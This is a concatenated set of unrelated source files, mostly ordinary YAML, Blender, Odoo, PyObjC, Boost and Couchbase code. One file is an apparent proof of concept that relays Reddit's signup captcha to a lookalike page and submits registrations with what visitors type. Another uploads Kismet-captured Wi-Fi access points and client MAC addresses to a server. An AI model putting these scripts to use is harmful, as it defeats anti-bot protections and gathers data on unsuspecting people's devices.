return self.construct_python_object_apply(suffix, node, newobj=True)
Constructor.add_constructor(
'tag:yaml.org,2002:python/none',
Constructor.construct_yaml_null)
Constructor.add_constructor(
'tag:yaml.org,2002:python/bool',
Constructor.construct_yaml_bool)
Constructor.add_constructor(
'tag:yaml.org,2002:python/str',
Constructor.construct_python_str)
Constructor.add_constructor(
'tag:yaml.org,2002:python/unicode',
Constructor.construct_python_unicode)
Constructor.add_constructor(
'tag:yaml.org,2002:python/bytes',
Constructor.construct_python_bytes)
Constructor.add_constructor(
'tag:yaml.org,2002:python/int',
Constructor.construct_yaml_int)
Constructor.add_constructor(
'tag:yaml.org,2002:python/long',
Constructor.construct_python_long)
Constructor.add_constructor(
'tag:yaml.org,2002:python/float',
Constructor.construct_yaml_float)
Constructor.add_constructor(
'tag:yaml.org,2002:python/complex',
Constructor.construct_python_complex)
Constructor.add_constructor(
'tag:yaml.org,2002:python/list',
Constructor.construct_yaml_seq)
Constructor.add_constructor(
'tag:yaml.org,2002:python/tuple',
Constructor.construct_python_tuple)
Constructor.add_constructor(
'tag:yaml.org,2002:python/dict',
Constructor.construct_yaml_map)
Constructor.add_multi_constructor(
'tag:yaml.org,2002:python/name:',
Constructor.construct_python_name)
Constructor.add_multi_constructor(
'tag:yaml.org,2002:python/module:',
Constructor.construct_python_module)
Constructor.add_multi_constructor(
'tag:yaml.org,2002:python/object:',
Constructor.construct_python_object)
Constructor.add_multi_constructor(
'tag:yaml.org,2002:python/object/apply:',
Constructor.construct_python_object_apply)
Constructor.add_multi_constructor(
'tag:yaml.org,2002:python/object/new:',
Constructor.construct_python_object_new)
| mit |
DolphinDream/sverchok | nodes/curve/freecad_helix.py | 2 | 3427 | # This file is part of project Sverchok. It's copyrighted by the contributors
# recorded in the version control history of the file, available from
# its original location https://github.com/nortikin/sverchok/commit/master
#
# SPDX-License-Identifier: GPL3
# License-Filename: LICENSE
import bpy
from bpy.props import FloatProperty, EnumProperty, BoolProperty, IntProperty
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import updateNode, zip_long_repeat, ensure_nesting_level
from sverchok.utils.curve.freecad import make_helix
from sverchok.utils.dummy_nodes import add_dummy
from sverchok.dependencies import FreeCAD
if FreeCAD is None:
add_dummy('SvFreeCadHelixNode', 'Helix (FreeCAD)', 'FreeCAD')
else:
import Part
from FreeCAD import Base
class SvFreeCadHelixNode(bpy.types.Node, SverchCustomTreeNode):
"""
Triggers: Helix
Tooltip: Generate a helix curve (as a NURBS)
"""
bl_idname = 'SvFreeCadHelixNode'
bl_label = 'Helix (FreeCAD)'
bl_icon = 'MOD_SCREW'
radius : FloatProperty(
name = "Radius",
default = 1.0,
update = updateNode)
height : FloatProperty(
name = "Height",
default = 4.0,
update = updateNode)
pitch : FloatProperty(
name = "Pitch",
description = "Helix step along it's axis for each full rotation",
default = 1.0,
update = updateNode)
angle : FloatProperty(
name = "Angle",
description = "Apex angle for conic helixes, in degrees; 0 for cylindrical helixes",
default = 0,
min = 0,
update = updateNode)
join : BoolProperty(
name = "Join",
description = "If checked, output a single flat list of curves; otherwise, output a separate list of curves for each set of input parameters",
default = False,
update = updateNode)
def draw_buttons(self, context, layout):
layout.prop(self, 'join', toggle=True)
def sv_init(self, context):
self.inputs.new('SvStringsSocket', "Radius").prop_name = 'radius'
self.inputs.new('SvStringsSocket', "Height").prop_name = 'height'
self.inputs.new('SvStringsSocket', "Pitch").prop_name = 'pitch'
self.inputs.new('SvStringsSocket', "Angle").prop_name = 'angle'
self.outputs.new('SvCurveSocket', "Curve")
def process(self):
if not any(socket.is_linked for socket in self.outputs):
return
radius_s = self.inputs['Radius'].sv_get()
height_s = self.inputs['Height'].sv_get()
pitch_s = self.inputs['Pitch'].sv_get()
angle_s = self.inputs['Angle'].sv_get()
curve_out = []
for radiuses, heights, pitches, angles in zip_long_repeat(radius_s, height_s, pitch_s, angle_s):
new_curves = []
for radius, height, pitch, angle in zip_long_repeat(radiuses, heights, pitches, angles):
curve = make_helix(pitch, height, radius, angle)
new_curves.append(curve)
if self.join:
curve_out.extend(new_curves)
else:
curve_out.append(new_curves)
self.outputs['Curve'].sv_set(curve_out)
def register():
if FreeCAD is not None:
bpy.utils.register_class(SvFreeCadHelixNode)
def unregister():
if FreeCAD is not None:
bpy.utils.unregister_class(SvFreeCadHelixNode)
| gpl-3.0 |
LatinuxSistemas/stock-logistics-warehouse | __unported__/stock_inventory_extended/__openerp__.py | 10 | 1688 | # -*- coding: utf-8 -*-
#################################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011 Julius Network Solutions SARL <contact@julius.fr>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#################################################################################
{
"name" : "Move Inventory Extended",
"version" : "1.0",
"author" : "Julius Network Solutions,Odoo Community Association (OCA)",
"description" : """
Presentation:
This module adds a new field based on lines into the inventory
to get all lines pre-filled and all lines scanned
""",
"website" : "http://www.julius.fr",
"depends" : [
"stock",
],
"category" : "Customs/Stock",
"init_xml" : [],
"demo_xml" : [],
"images" : ['images/Inventory extended.png'],
"update_xml" : [
'stock_view.xml',
# 'wizard/stock_fill_inventory_view.xml',
],
'test': [],
'installable': False,
'active': False,
'certificate': '',
}
| agpl-3.0 |
albertz/music-player | mac/pyobjc-framework-Cocoa/PyObjCTest/test_nsxpcconnection.py | 3 | 1584 | from PyObjCTools.TestSupport import *
import Foundation
class XPCHelper (Foundation.NSObject):
def remoteObjectProxyWithErrorHandler_(self, a): pass
def listener_shouldAcceptNewConnection_(self, a, b): pass
class TestNSXPCConnection (TestCase):
@min_os_level('10.8')
def testConstants10_8(self):
self.assertEqual(Foundation.NSXPCConnectionPrivileged, 1<<12)
@min_os_level('10.8')
def testProtocol10_8(self):
self.assertArgIsBlock(XPCHelper.remoteObjectProxyWithErrorHandler_, 0, b'v@')
self.assertResultIsBOOL(XPCHelper.listener_shouldAcceptNewConnection_)
@min_os_level('10.8')
def testMethods10_8(self):
self.assertArgIsBlock(Foundation.NSXPCConnection.remoteObjectProxyWithErrorHandler_, 0, b'v@')
self.assertResultIsBlock(Foundation.NSXPCConnection.interruptionHandler, b'v')
self.assertArgIsBlock(Foundation.NSXPCConnection.setInterruptionHandler_, 0, b'v')
self.assertResultIsBlock(Foundation.NSXPCConnection.invalidationHandler, b'v')
self.assertArgIsBlock(Foundation.NSXPCConnection.setInvalidationHandler_, 0, b'v')
self.assertArgIsBOOL(Foundation.NSXPCInterface.setClasses_forSelector_argumentIndex_ofReply_, 3)
self.assertArgIsBOOL(Foundation.NSXPCInterface.classesForSelector_argumentIndex_ofReply_, 2)
self.assertArgIsBOOL(Foundation.NSXPCInterface.setInterface_forSelector_argumentIndex_ofReply_, 3)
self.assertArgIsBOOL(Foundation.NSXPCInterface.interfaceForSelector_argumentIndex_ofReply_, 2)
if __name__ == "__main__":
main()
| bsd-2-clause |
akretion/odoo | addons/mrp/tests/test_stock.py | 10 | 9525 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from . import common
from odoo.exceptions import except_orm
class TestWarehouse(common.TestMrpCommon):
def setUp(self):
super(TestWarehouse, self).setUp()
self.stock_location = self.env.ref('stock.stock_location_stock')
self.depot_location = self.env['stock.location'].create({
'name': 'Depot',
'usage': 'internal',
'location_id': self.stock_location.id,
})
putaway = self.env['product.putaway'].create({
'name': 'putaway stock->depot',
'fixed_location_ids': [(0, 0, {
'category_id': self.env.ref('product.product_category_all').id,
'fixed_location_id': self.depot_location.id,
})]
})
self.stock_location.write({
'putaway_strategy_id': putaway.id,
})
self.laptop = self.env.ref("product.product_product_25")
graphics_card = self.env.ref("product.product_product_24")
unit = self.env.ref("uom.product_uom_unit")
mrp_routing = self.env.ref("mrp.mrp_routing_0")
bom_laptop = self.env['mrp.bom'].create({
'product_tmpl_id': self.laptop.product_tmpl_id.id,
'product_qty': 1,
'product_uom_id': unit.id,
'bom_line_ids': [(0, 0, {
'product_id': graphics_card.id,
'product_qty': 1,
'product_uom_id': unit.id
})],
'routing_id': mrp_routing.id
})
# Return a new Manufacturing Order for laptop
def new_mo_laptop():
return self.env['mrp.production'].create({
'product_id': self.laptop.id,
'product_qty': 1,
'product_uom_id': unit.id,
'bom_id': bom_laptop.id
})
self.new_mo_laptop = new_mo_laptop
def test_manufacturing_route(self):
warehouse_1_stock_manager = self.warehouse_1.sudo(self.user_stock_manager)
manu_rule = self.env['stock.rule'].search([
('action', '=', 'manufacture'),
('warehouse_id', '=', self.warehouse_1.id)])
self.assertEqual(self.warehouse_1.manufacture_pull_id, manu_rule)
manu_route = manu_rule.route_id
self.assertIn(manu_route, warehouse_1_stock_manager._get_all_routes())
warehouse_1_stock_manager.write({
'manufacture_to_resupply': False
})
self.assertFalse(self.warehouse_1.manufacture_pull_id.active)
self.assertFalse(self.warehouse_1.manu_type_id.active)
self.assertNotIn(manu_route, warehouse_1_stock_manager._get_all_routes())
warehouse_1_stock_manager.write({
'manufacture_to_resupply': True
})
manu_rule = self.env['stock.rule'].search([
('action', '=', 'manufacture'),
('warehouse_id', '=', self.warehouse_1.id)])
self.assertEqual(self.warehouse_1.manufacture_pull_id, manu_rule)
self.assertTrue(self.warehouse_1.manu_type_id.active)
self.assertIn(manu_route, warehouse_1_stock_manager._get_all_routes())
def test_manufacturing_scrap(self):
"""
Testing to do a scrap of consumed material.
"""
# Update demo products
(self.product_4 | self.product_2).write({
'tracking': 'lot',
})
# Update Bill Of Material to remove product with phantom bom.
self.bom_3.bom_line_ids.filtered(lambda x: x.product_id == self.product_5).unlink()
# Create Inventory Adjustment For Stick and Stone Tools with lot.
lot_product_4 = self.env['stock.production.lot'].create({
'name': '0000000000001',
'product_id': self.product_4.id,
})
lot_product_2 = self.env['stock.production.lot'].create({
'name': '0000000000002',
'product_id': self.product_2.id,
})
stock_inv_product_4 = self.env['stock.inventory'].create({
'name': 'Stock Inventory for Stick',
'filter': 'product',
'product_id': self.product_4.id,
'line_ids': [
(0, 0, {'product_id': self.product_4.id, 'product_uom_id': self.product_4.uom_id.id, 'product_qty': 8, 'prod_lot_id': lot_product_4.id, 'location_id': self.ref('stock.stock_location_14')}),
]})
stock_inv_product_2 = self.env['stock.inventory'].create({
'name': 'Stock Inventory for Stone Tools',
'filter': 'product',
'product_id': self.product_2.id,
'line_ids': [
(0, 0, {'product_id': self.product_2.id, 'product_uom_id': self.product_2.uom_id.id, 'product_qty': 12, 'prod_lot_id': lot_product_2.id, 'location_id': self.ref('stock.stock_location_14')})
]})
(stock_inv_product_4 | stock_inv_product_2).action_start()
stock_inv_product_2.action_validate()
stock_inv_product_4.action_validate()
#Create Manufacturing order.
production_3 = self.env['mrp.production'].create({
'name': 'MO-Test003',
'product_id': self.product_6.id,
'product_qty': 12,
'bom_id': self.bom_3.id,
'product_uom_id': self.product_6.uom_id.id,
})
production_3.action_assign()
# Check Manufacturing order's availability.
self.assertEqual(production_3.availability, 'assigned', "Production order's availability should be Available.")
location_id = production_3.move_raw_ids.filtered(lambda x: x.state not in ('done', 'cancel')) and production_3.location_src_id.id or production_3.location_dest_id.id,
# Scrap Product Wood without lot to check assert raise ?.
scrap_id = self.env['stock.scrap'].with_context(active_model='mrp.production', active_id=production_3.id).create({'product_id': self.product_2.id, 'scrap_qty': 1.0, 'product_uom_id': self.product_2.uom_id.id, 'location_id': location_id, 'production_id': production_3.id})
with self.assertRaises(except_orm):
scrap_id.do_scrap()
# Scrap Product Wood with lot.
self.env['stock.scrap'].with_context(active_model='mrp.production', active_id=production_3.id).create({'product_id': self.product_2.id, 'scrap_qty': 1.0, 'product_uom_id': self.product_2.uom_id.id, 'location_id': location_id, 'lot_id': lot_product_2.id, 'production_id': production_3.id})
#Check scrap move is created for this production order.
#TODO: should check with scrap objects link in between
# scrap_move = production_3.move_raw_ids.filtered(lambda x: x.product_id == self.product_2 and x.scrapped)
# self.assertTrue(scrap_move, "There are no any scrap move created for production order.")
def test_putaway_after_manufacturing_1(self):
""" This test checks a manufactured product without tracking will go to
location defined in putaway strategy.
"""
mo_laptop = self.new_mo_laptop()
mo_laptop.button_plan()
workorder = mo_laptop.workorder_ids[0]
workorder.button_start()
workorder.record_production()
mo_laptop.button_mark_done()
# We check if the laptop go in the depot and not in the stock
move = mo_laptop.move_finished_ids
location_dest = move.move_line_ids.location_dest_id
self.assertEqual(location_dest.id, self.depot_location.id)
self.assertNotEqual(location_dest.id, self.stock_location.id)
def test_putaway_after_manufacturing_2(self):
""" This test checks a tracked manufactured product will go to location
defined in putaway strategy.
"""
self.laptop.tracking = 'serial'
mo_laptop = self.new_mo_laptop()
mo_laptop.button_plan()
workorder = mo_laptop.workorder_ids[0]
workorder.button_start()
serial = self.env['stock.production.lot'].create({'product_id': self.laptop.id})
workorder.final_lot_id = serial
workorder.record_production()
mo_laptop.button_mark_done()
# We check if the laptop go in the depot and not in the stock
move = mo_laptop.move_finished_ids
location_dest = move.move_line_ids.location_dest_id
self.assertEqual(location_dest.id, self.depot_location.id)
self.assertNotEqual(location_dest.id, self.stock_location.id)
def test_putaway_after_manufacturing_3(self):
""" This test checks a tracked manufactured product will go to location
defined in putaway strategy when the production is recorded with
product.produce wizard.
"""
self.laptop.tracking = 'serial'
mo_laptop = self.new_mo_laptop()
serial = self.env['stock.production.lot'].create({'product_id': self.laptop.id})
product_produce = self.env['mrp.product.produce'].with_context({
'active_id': mo_laptop.id,
'active_ids': [mo_laptop.id],
}).create({
'product_qty': 1.0,
'lot_id': serial.id,
})
product_produce.do_produce()
mo_laptop.button_mark_done()
# We check if the laptop go in the depot and not in the stock
move = mo_laptop.move_finished_ids
location_dest = move.move_line_ids.location_dest_id
self.assertEqual(location_dest.id, self.depot_location.id)
self.assertNotEqual(location_dest.id, self.stock_location.id)
| agpl-3.0 |
infosec-au/CaptchaJackingPoC | failed_attempts/cjack_reddit_requests.py | 3 | 4739 | from random import choice
import cherrypy
import requests
import re
import os.path
import cookielib
import urllib
import logging
import mechanize
from bs4 import BeautifulSoup
import cStringIO
## Mechanize Approach!
cj = cookielib.LWPCookieJar()
br = mechanize.Browser()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
br.open("http://www.reddit.com/register")
for f in br.forms():
print f
html_reg = br.response().read()
source_fixed1 = html_reg
cap_iden1 = re.compile(r'value="[A-Za-z0-9]{32}')
captchai1 = cap_iden1.search(source_fixed1)
cident_raw1 = captchai1.group()
cident1 = captchai1.group()
cident1 = cident1.replace("value=\"", "")
captchaname1 = "captchas/" + cident1 + ".png"
captchaurl1 = "http://reddit.com/captcha/{0}.png".format(cident1)
## Requests Approach ! didn't work!!
url = 'http://www.reddit.com/register'
ualist= [line.rstrip() for line in open('useragents.txt')]
headers = {'User-Agent': '{0}'.format(choice(ualist)),
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'http://www.reddit.com/register',}
#cherrypy handling below
rsess = requests.Session()
regpage = rsess.get(url, headers=headers)
source = regpage.text
source_fixed = source.encode('ascii','ignore')
cap_iden = re.compile(r'value="[A-Za-z0-9]{32}')
captchai = cap_iden.search(source_fixed)
cident_raw = captchai.group()
cident = captchai.group()
cident = cident.replace("value=\"", "")
captchaname = "captchas/" + cident + ".png"
captchaurl = "http://reddit.com/captcha/{0}.png".format(cident)
class reddit_cjack:
def index(self):
with open(captchaname1, 'wb') as handle:
request = rsess.get(captchaurl1, headers=headers, stream=True)
for block in request.iter_content(1024):
if not block:
break
handle.write(block)
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
<meta charset="utf-8" />
<title>Reddit Captcha Hijacking PoC</title>
<link rel="stylesheet" href="css/master.css" type="text/css" />
</head>
<body id="index">
<div id="container">
<div id="header"><h1>Captchajacking PoC - blog post <a href="http://blog.shubh.am/">here.</a></h1></div>
<div id="main">
<form action="execute" method="post">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="form-input-name">Username</td>
<td class="input"><input type="username" name="username" placeholder="crash override" autocomplete="off" required="required" /></td>
</tr>
<tr>
<td class="form-input-name">Password</td>
<td class="input"><input type="password" name="passw" placeholder="gibsonhacker101" autocomplete="off" required="required" /></td>
</tr>
<tr>
<td class="form-input-name">Captcha</td>
<td class="input">""" + """<img src=""" + captchaname1 + """></img>""" + """<textarea name="captcha" rows="5" cols="29" placeholder="Captcha Text"></textarea></td>
</tr>
<tr>
<td class="form-input-name"></td>
<td><input type="submit" value="Register" /></td>
</tr>
</table>
</form>
</div>
</div>
</body>
</html>"""
index.exposed = True
def execute(self, username, passw, captcha):
br.select_form(nr=0)
br.form[ 'user' ] = username
br.form[ 'passwd' ] = passw
br.form[ 'passwd2' ] = passw
br.form[ 'captcha' ] = captcha
br.submit()
# rposturl = "https://ssl.reddit.com/api/register/" + username
# datapayload = {
# 'op':'reg',
# 'dest' : '%2F',
# 'user' : username,
# 'email' : '',
# 'passwd' : passw,
# 'passwd2' : passw,
# 'iden' : cident_raw,
# 'captcha' : captcha,
# 'api_type' : 'json'
# }
# regpost = rsess.post(rposturl, data=datapayload, headers=headers)
# return regpost.text
execute.exposed= True
PATH = os.path.abspath(os.path.dirname(__file__))
conf = {
'/': {
'tools.staticdir.on': True,
'tools.staticdir.dir': PATH,
},
}
cherrypy.tree.mount(reddit_cjack(), "/", config=conf)
cherrypy.engine.start()
cherrypy.engine.block() | mit |
cpascal/af-cpp | apdos/exts/boost_1_53_0/tools/build/v2/test/library_chain.py | 2 | 3602 | #!/usr/bin/python
# Copyright 2003, 2004, 2005, 2006 Vladimir Prus
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
# Test that a chain of libraries works ok, no matter if we use static or shared
# linking.
import BoostBuild
import string
import os
t = BoostBuild.Tester()
t.write("jamfile.jam", """
# Stage the binary, so that it will be relinked without hardcode-dll-paths. That
# will chech that we pass correct -rpath-link, even if not passing -rpath.
stage dist : main ;
exe main : main.cpp b ;
""")
t.write("main.cpp", """
void foo();
int main() { foo(); }
""")
t.write("jamroot.jam", """
""")
t.write("a/a.cpp", """
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
gee() {}
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
geek() {}
""")
t.write("a/jamfile.jam", """
lib a : a.cpp ;
""")
t.write("b/b.cpp", """
void geek();
void
#if defined(_WIN32)
__declspec(dllexport)
#endif
foo() { geek(); }
""")
t.write("b/jamfile.jam", """
lib b : b.cpp ../a//a ;
""")
t.run_build_system("-d2", stderr=None)
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.run_build_system("link=static")
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Check that <library> works for static linking.
t.write("b/jamfile.jam", """
lib b : b.cpp : <library>../a//a ;
""")
t.run_build_system("link=static")
t.expect_addition("bin/$toolset/debug/link-static/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
t.write("b/jamfile.jam", """
lib b : b.cpp ../a//a/<link>shared : <link>static ;
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.rm(["bin", "a/bin", "b/bin"])
# Test that putting a library in sources of a searched library works.
t.write("jamfile.jam", """
exe main : main.cpp png ;
lib png : z : <name>png ;
lib z : : <name>zzz ;
""")
t.run_build_system("-a -d+2", status=None, stderr=None)
# Try to find the "zzz" string either in response file (for Windows compilers),
# or in the standard output.
rsp = t.adjust_names("bin/$toolset/debug/main.exe.rsp")[0]
if os.path.exists(rsp) and ( string.find(open(rsp).read(), "zzz") != -1 ):
pass
elif string.find(t.stdout(), "zzz") != -1:
pass
else:
t.fail_test(1)
# Test main -> libb -> liba chain in the case where liba is a file and not a
# Boost.Build target.
t.rm(".")
t.write("jamroot.jam", "")
t.write("a/jamfile.jam", """
lib a : a.cpp ;
install dist : a ;
""")
t.write("a/a.cpp", """
#if defined(_WIN32)
__declspec(dllexport)
#endif
void a() {}
""")
t.run_build_system(subdir="a")
t.expect_addition("a/dist/a.dll")
if ( ( os.name == 'nt' ) or os.uname()[0].lower().startswith('cygwin') ) and \
( BoostBuild.get_toolset() != 'gcc' ):
# This is windows import library -- we know the exact name.
file = "a/dist/a.lib"
else:
file = t.adjust_names(["a/dist/a.dll"])[0]
t.write("b/jamfile.jam", """
lib b : b.cpp ../%s ;
""" % file)
t.write("b/b.cpp", """
#if defined(_WIN32)
__declspec(dllimport)
#endif
void a();
#if defined(_WIN32)
__declspec(dllexport)
#endif
void b() { a(); }
""")
t.write("jamroot.jam", """
exe main : main.cpp b//b ;
""")
t.write("main.cpp", """
#if defined(_WIN32)
__declspec(dllimport)
#endif
void b();
int main() { b(); }
""")
t.run_build_system()
t.expect_addition("bin/$toolset/debug/main.exe")
t.cleanup()
| apache-2.0 |
gstarnberger/paasta | paasta_tools/am_i_mesos_leader.py | 1 | 1039 | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./am_i_mesos_leader.py
Check if this host is the curret mesos-master leader.
This is done by simply calling mesos_tools.is_mesos_leader.
Exits 0 if this is the leader, and 1 if it isn't.
"""
from sys import exit
from paasta_tools.mesos_tools import is_mesos_leader
def main():
if is_mesos_leader():
print True
exit(0)
else:
print False
exit(1)
if __name__ == "__main__":
main()
| apache-2.0 |
xcellerator/wifi_harvester | upload.py | 1 | 1335 | #!/usr/bin/python2.7
# Part of the WiFi Harvester project.
# AUTHOR: Harvey Phillips
# Project Home: https://github.com/xcellerator/wifi_harvester
# Released under GPL v2
import csv
import sys
import requests
if ( len(sys.argv) != 2 ):
print ("Usage: " + str(sys.argv[0]) + " <kismet csv>")
exit
else:
file = str(sys.argv[1])
with open(file, 'rU') as f:
reader = csv.reader(f)
data = list(list(rec) for rec in csv.reader(f, delimiter=','))
f.close()
split = data.index(['Station MAC', ' First time seen', ' Last time seen', ' Power', ' # packets', ' BSSID', ' Probed ESSIDs'])
ap_content = []
cl_content = []
server = "192.168.1.235"
for x in range(2, split - 1):
ESSID = data[x][13]
BSSID = data[x][0]
enc_string = data[x][5]
if (enc_string == " OPN"): enc_type = 0
if (enc_string == " WEP"): enc_type = 1
if (enc_string == " WPA2"): enc_type = 2
if (enc_string == " WPA2 WPA"): enc_type = 2
ap_content.append( [ 0, ESSID, BSSID, enc_type ] )
for x in range(split + 1, int(len(data)) - 1):
BSSID = data[x][0]
cl_content.append( [1, "NULL", BSSID, "NULL" ] )
content = ap_content + cl_content
for entry in content:
url = "http://" + server + "/update.php?a=" + str(entry[0]) + "&b=" + entry[1] + "&c=" + entry[2] + "&d=" + str(entry[3])
r = requests.get(url)
print "Captures uploaded successfully.\n"
| gpl-2.0 |
couchbaselabs/couchbase-cli | collector.py | 1 | 10474 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import traceback
import copy
import listservers
import buckets
import info
import util_cli as util
import cb_bin_client
import stats_buffer
class StatsCollector:
def __init__(self, log):
self.log = log
def seg(self, k, v):
# Parse ('some_stat_x_y', 'v') into (('some_stat', x, y), v)
ka = k.split('_')
k = '_'.join(ka[0:-1])
kstart, kend = [int(x) for x in ka[-1].split(',')]
return ((k, kstart, kend), int(v))
def retrieve_node_stats(self, nodeInfo, nodeStats):
nodeStats['portDirect'] = nodeInfo['ports']['direct']
nodeStats['portProxy'] = nodeInfo['ports']['proxy']
nodeStats['clusterMembership'] = nodeInfo['clusterMembership']
nodeStats['os'] = nodeInfo['os']
nodeStats['uptime'] = nodeInfo['uptime']
nodeStats['version'] = nodeInfo['version']
#memory
nodeStats['memory'] = {}
nodeStats['memory']['allocated'] = nodeInfo['mcdMemoryAllocated']
nodeStats['memory']['reserved'] = nodeInfo['mcdMemoryReserved']
nodeStats['memory']['free'] = nodeInfo['memoryFree']
nodeStats['memory']['quota'] = nodeInfo['memoryQuota']
nodeStats['memory']['total'] = nodeInfo['memoryTotal']
#storageInfo
nodeStats['StorageInfo'] = {}
if nodeInfo['storageTotals'] is not None:
#print nodeInfo
hdd = nodeInfo['storageTotals']['hdd']
if hdd is not None:
nodeStats['StorageInfo']['hdd'] = {}
nodeStats['StorageInfo']['hdd']['free'] = hdd['free']
nodeStats['StorageInfo']['hdd']['quotaTotal'] = hdd['quotaTotal']
nodeStats['StorageInfo']['hdd']['total'] = hdd['total']
nodeStats['StorageInfo']['hdd']['used'] = hdd['used']
nodeStats['StorageInfo']['hdd']['usedByData'] = hdd['usedByData']
ram = nodeInfo['storageTotals']['ram']
if ram is not None:
nodeStats['StorageInfo']['ram'] = {}
nodeStats['StorageInfo']['ram']['quotaTotal'] = ram['quotaTotal']
nodeStats['StorageInfo']['ram']['total'] = ram['total']
nodeStats['StorageInfo']['ram']['used'] = ram['used']
nodeStats['StorageInfo']['ram']['usedByData'] = ram['usedByData']
if ram.has_key('quotaUsed'):
nodeStats['StorageInfo']['ram']['quotaUsed'] = ram['quotaUsed']
else:
nodeStats['StorageInfo']['ram']['quotaUsed'] = 0
#system stats
nodeStats['systemStats'] = {}
nodeStats['systemStats']['cpu_utilization_rate'] = nodeInfo['systemStats']['cpu_utilization_rate']
nodeStats['systemStats']['swap_total'] = nodeInfo['systemStats']['swap_total']
nodeStats['systemStats']['swap_used'] = nodeInfo['systemStats']['swap_used']
curr_items = 0
curr_items_tot = 0
vb_rep_curr_items = 0
if nodeInfo['interestingStats'] is not None:
if nodeInfo['interestingStats'].has_key('curr_items'):
curr_items = nodeInfo['interestingStats']['curr_items']
else:
curr_items = 0
if nodeInfo['interestingStats'].has_key('curr_items_tot'):
curr_items_tot = nodeInfo['interestingStats']['curr_items_tot']
else:
curr_items_tot = 0
if nodeInfo['interestingStats'].has_key('vb_replica_curr_items'):
vb_rep_curr_items = nodeInfo['interestingStats']['vb_replica_curr_items']
else:
vb_rep_curr_items = 0
nodeStats['systemStats']['currentItems'] = curr_items
nodeStats['systemStats']['currentItemsTotal'] = curr_items_tot
nodeStats['systemStats']['replicaCurrentItems'] = vb_rep_curr_items
def get_hostlist(self, server, port, user, password, opts):
try:
opts.append(("-o", "return"))
nodes = listservers.ListServers().runCmd('host-list', server, port, user, password, opts)
for node in nodes:
(node_server, node_port) = util.hostport(node['hostname'])
node_stats = {"host" : node_server,
"port" : node_port,
"status" : node['status'],
"master" : server}
stats_buffer.nodes[node['hostname']] = node_stats
if node['status'] == 'healthy':
node_info = info.Info().runCmd('get-server-info', node_server, node_port, user, password, opts)
self.retrieve_node_stats(node_info, node_stats)
else:
self.log.error("Unhealthy node: %s:%s" %(node_server, node['status']))
return nodes
except Exception, err:
traceback.print_exc()
sys.exit(1)
def get_bucketlist(self, server, port, user, password, opts):
try:
bucketlist = buckets.Buckets().runCmd('bucket-get', server, port, user, password, opts)
for bucket in bucketlist:
bucket_name = bucket['name']
self.log.info("bucket: %s" % bucket_name)
bucketinfo = {}
bucketinfo['name'] = bucket_name
bucketinfo['bucketType'] = bucket['bucketType']
bucketinfo['authType'] = bucket['authType']
bucketinfo['saslPassword'] = bucket['saslPassword']
bucketinfo['numReplica'] = bucket['replicaNumber']
bucketinfo['ramQuota'] = bucket['quota']['ram']
bucketinfo['master'] = server
bucketStats = bucket['basicStats']
bucketinfo['bucketStats'] = {}
bucketinfo['bucketStats']['diskUsed'] = bucketStats['diskUsed']
bucketinfo['bucketStats']['memUsed'] = bucketStats['memUsed']
bucketinfo['bucketStats']['diskFetches'] = bucketStats['diskFetches']
bucketinfo['bucketStats']['quotaPercentUsed'] = bucketStats['quotaPercentUsed']
bucketinfo['bucketStats']['opsPerSec'] = bucketStats['opsPerSec']
bucketinfo['bucketStats']['itemCount'] = bucketStats['itemCount']
stats_buffer.bucket_info[bucket_name] = bucketinfo
# get bucket related stats
c = buckets.BucketStats(bucket_name)
json = c.runCmd('bucket-stats', server, port, user, password, opts)
stats_buffer.buckets_summary[bucket_name] = json
return bucketlist
except Exception, err:
traceback.print_exc()
sys.exit(1)
def get_mc_stats_per_node(self, mc, stats):
cmd_list = ["timings", "tap", "checkpoint", "memory", ""]
#cmd_list = ["tap"]
try:
for cmd in cmd_list:
node_stats = mc.stats(cmd)
if node_stats:
if cmd == "timings":
# need to preprocess histogram data first
vals = sorted([self.seg(*kv) for kv in node_stats.items()])
dd = {}
totals = {}
longest = 0
for s in vals:
avg = (s[0][1] + s[0][2]) / 2
k = s[0][0]
l = dd.get(k, [])
l.append((avg, s[1]))
dd[k] = l
totals[k] = totals.get(k, 0) + s[1]
for k in sorted(dd):
ccount = 0
for lbl,v in dd[k]:
ccount += v * lbl
stats[k] = ccount / totals[k]
else:
